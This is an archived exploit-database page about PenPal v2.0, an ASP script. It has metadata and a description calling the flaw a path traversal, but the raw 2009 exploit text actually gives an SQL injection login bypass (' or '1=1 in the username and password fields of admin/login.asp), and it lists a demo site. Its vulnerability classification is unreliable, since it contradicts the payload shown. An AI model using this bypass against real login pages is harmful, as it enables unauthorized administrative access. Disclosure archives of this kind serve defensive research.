header-logo
Suggest Exploit
vendor:
PenPal
by:
ByALBAYX
8.5
CVSS
HIGH
Path Traversal
22
CWE
Product Name: PenPal
Affected Version From: 2
Affected Version To: 2
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

PenPal v2.0 Path Traversal Vulnerability

PenPal v2.0 is prone to a path traversal vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to access arbitrary files on the affected computer with the privileges of the webserver process. This may lead to the disclosure of sensitive information that may aid in further attacks.

Mitigation:

PenPal v2.0 should be updated to the latest version.
Source

Exploit-DB raw data:

@~~=======================================~~@
====C4TEAM.ORG====ByALBAYX====C4TEAM.ORG=====
@~~=======================================~~@
@~~=Author   : ByALBAYX

@~~=Website  : WWW.C4TEAM.ORG

@~~=From     : Turkish
@~~=======================================~~@
@~~=Script   :PenPal v2.0

@~~=S.Site   :http://anblik.com

@~~=Download :http://www.anblik.com/store/asp-scripts/penpal.html

@~~=Demo     :http://penpal.ankoor.com

@~~=Price    :1200.00 USD
@~~=======================================~~@

@~~=Exploit:

@~~=Username: ' or '1=1

@~~=Password: ' or '1=1


@~~=http://c4team.org /PenPal v2.0_Path /admin/login.asp


@~~=Demo:

@~~=http://penpal.ankoor.com/admin/login.asp

vs..
@~~=======================================~~@
@~~=Greetz For
  
@~~=Str0ke & Kralman & Mrabah12R & K3vin Mitnick & web-terrorist & Silent & SpotGang
@~~=======================================~~@
Derdimi dinledim, derdimden iGRENDiM...
Onun derdini gordum, derdime iMRENDiM...
FilistiN
@~~=======================================~~@

# milw0rm.com [2009-02-25]